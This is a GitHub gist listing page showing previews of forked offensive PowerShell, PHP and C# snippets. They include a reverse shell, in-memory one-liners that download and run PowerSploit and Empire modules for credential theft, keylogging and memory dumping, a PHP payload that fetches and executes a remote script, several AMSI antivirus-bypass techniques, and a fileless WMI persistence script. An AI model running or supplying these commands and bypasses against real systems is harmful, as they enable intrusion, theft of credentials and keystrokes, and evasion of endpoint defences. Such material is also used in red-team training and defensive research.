mmyyhack / DynWin32-ReverseShell.ps1

Created April 13, 2023 18:33 — forked from Dviros/DynWin32-ReverseShell.ps1

PowerShell reverse shell that uses dynamically resolved Win32 API functions

	<#

	DynWin32-ReverseShell.ps1 is a reverse shell based on dynamically looked up Win32 API calls.
	The script uses reflection to obtain access to GetModuleHandle, GetProcAddress and CreateProcess.
	Afterwards it uses GetModuleHandle and GetProcAddress to resolve the required WSA functions
	from ws2_32.dll.

	This script should be used for educational purposes only (and maybe while playing CTF :D).
	It was only tested on Windows 10 (x64) and is probably not stable or portable. It's only
	purpose is to demonstrate the usage of reflective lookups of Win32 API calls. See it as

mmyyhack / In-memory PS injection.txt

Created April 9, 2023 22:52 — forked from chr0n1k/In-memory PS injection.txt

Some in-memory Powershell injection scripts

	#IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/Get-System.ps1');

	#IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/collection/Invoke-Inveigh.ps1')

	#"IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Out-Minidump.ps1')

	#IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-VaultCredential.ps1'); Get-VaultCredential

	#IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-Keystrokes.ps1')

mmyyhack / PowershellAes.ps1

Created December 19, 2022 22:50 — forked from ctigeek/PowershellAes.ps1

Aes Encryption using powershell.

	function Create-AesManagedObject($key, $IV) {
	$aesManaged = New-Object "System.Security.Cryptography.AesManaged"
	$aesManaged.Mode = [System.Security.Cryptography.CipherMode]::CBC
	$aesManaged.Padding = [System.Security.Cryptography.PaddingMode]::Zeros
	$aesManaged.BlockSize = 128
	$aesManaged.KeySize = 256
	if ($IV) {
	if ($IV.getType().Name -eq "String") {
	$aesManaged.IV = [System.Convert]::FromBase64String($IV)
	}

mmyyhack / decode.vbs

Last active December 18, 2022 23:14 — forked from Plazmaz/decode.vbs

A tool for decoding IcedID arrays

	' Usage: cscript decode.vbs <array>
	' Example:
	' cscript decode.vbs "Array(g6,u7,s8,d4,z3,u7,b6,l5,j4,e9,k7,z1,k7)"
	' returns qMUuDMFaZ.txt
	conST r2=27
	CONsT rr2=38
	coNSt C5=42
	cOnST D4=130
	ConST t=132
	coNst g2=146

mmyyhack / alpha.php

Created December 14, 2022 01:51 — forked from kamakazix/alpha.php

AMSI Bypass

	<?php
	function yolo() {
	$payload = "powershell -nop -exec bypass -c IEX(New-Object Net.WebClient).DownloadString('http://172.16.165.1/beta.ps1')";
	$execution_command = "shell_exec";
	$query = $execution_command("$payload");
	echo $query;
	}
	yolo();
	die();
	?>

mmyyhack / amsi-bypass.md

Created December 14, 2022 01:37 — forked from D3Ext/amsi-bypass.md

All methods to bypass AMSI (2022)

AMSI Bypass

To perform all this techniques you can simply try them by typing "Invoke-Mimikatz" into your powershell terminal, you'll notice that even if you haven't imported Mimikatz it will detect that as malicious. But if the AMSI is off or you avoid it, it just will say that "it's not recognized as the name of a cmdlet", so you could say that you've bypassed the AMSI

However some methods may be detected by the AV but most of them actually work without problem

Powershell downgrade

The first and worst way to bypass AMSI is downgrading powershell version to 2.0.

mmyyhack / my-dotnet-am-bypass.cs

Created December 12, 2022 21:37 — forked from FatRodzianko/my-dotnet-am-bypass.cs

AMSI bypass that modifies the bytes of the patch and then changes them in a for loop. ".\csc.exe -target:library -out:C:\Exclusions\my-dotnet-am-bypass.dll C:\Exclusions\my-dotnet-am-bypass.cs" "Add-Type -Path C:\Exclusions\my-dotnet-am-bypass.dll" "[Amsi]::Bypass()"

	using System;
	using System.Runtime.InteropServices;

	public class Amsi
	{
	static byte[] patch = new byte[] { 0xBA, 0x59, 0x02, 0x09, 0x82, 0xC5 };



	public static void Bypass()

mmyyhack / my-am-bypass.ps1

Created December 12, 2022 18:51 — forked from FatRodzianko/my-am-bypass.ps1

small modification to Rastemouse's AmsiScanBuffer bypass to use bytes. Uses different opcode bytes

	$Win32 = @"
	using System;
	using System.Runtime.InteropServices;

	public class Win32 {

	[DllImport("kernel32")]
	public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);

	[DllImport("kernel32")]

mmyyhack / Invoke-Bypass.ps1

Created December 11, 2022 22:48 — forked from r00t-3xp10it/Invoke-Bypass.ps1

Disable AMS1 string scanning within curent process.

	<#
	.SYNOPSIS
	Disable AMS1 within current process.

	Author: @r00t-3xp10it
	Tested Under: Windows 10 (19042) x64 bits
	Required Dependencies: Assembly {native}
	Optional Dependencies: IWR {native}
	PS cmdlet Dev version: v1.1.4

mmyyhack / WMI-Persistence.ps1

Created December 9, 2022 22:31 — forked from infosecn1nja/WMI-Persistence.ps1

Fileless WMI Persistence (PSEDWMIEvent_SU - SystemUptime)

	# Fileless WMI Persistence (PSEDWMIEvent_SU - SystemUptime)
	# https://wikileaks.org/ciav7p1/cms/page_14587908.html

	<#
	.SYNOPSIS
	This script creates a persisted WMI event that executes a command upon trigger of the system's uptime being between a given range in seconds. The event will trigger only once.
	#>

	$EventFilterName = "Fileless WMI Persistence SystemUptime"